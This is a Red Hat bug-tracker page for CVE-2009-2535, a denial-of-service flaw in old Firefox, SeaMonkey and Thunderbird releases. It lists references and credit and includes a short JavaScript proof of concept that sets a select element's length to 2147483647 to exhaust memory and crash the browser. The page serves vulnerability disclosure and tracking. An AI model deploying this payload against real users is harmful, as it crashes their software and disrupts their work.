Bug 512909 (CVE-2009-2535) - CVE-2009-2535 Firefox, SeaMonkey, Thunderbird: DoS via large length property of a Select object
Summary: CVE-2009-2535 Firefox, SeaMonkey, Thunderbird: DoS via large length property ...
Keywords:
Status: CLOSED UPSTREAM
Alias: CVE-2009-2535
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: http://www.securityfocus.com/archive/...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2009-07-21 09:58 UTC by Jan Lieskovsky
Modified: 2019-09-29 12:30 UTC (History)
3 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2015-08-22 15:26:45 UTC
Embargoed:

Attachments (Terms of Use)

Description Jan Lieskovsky 2009-07-21 09:58:19 UTC 
Common Vulnerabilities and Exposures assigned an identifier of CVE-2009-2535 to
the following vulnerability:

Mozilla Firefox before 2.0.0.19 and 3.x before 3.0.5, SeaMonkey, and
Thunderbird allow remote attackers to cause a denial of service
(memory consumption and application crash) via a large integer value
for the length property of a Select object, a related issue to
CVE-2009-1692.

References:
-----------
http://www.securityfocus.com/archive/1/archive/1/504989/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/504988/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/504969/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/505006/100/0/threaded
http://www.milw0rm.com/exploits/9160
http://www.g-sec.lu/one-bug-to-rule-them-all.html
https://bugzilla.mozilla.org/show_bug.cgi?id=460713

Credit: Thierry Zoller 
-------

Proof of Concept:
----------------
<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>

URL: 
----
http://www.crashthisthing.com/select.html
Note You need to log in before you can comment on or make changes to this bug.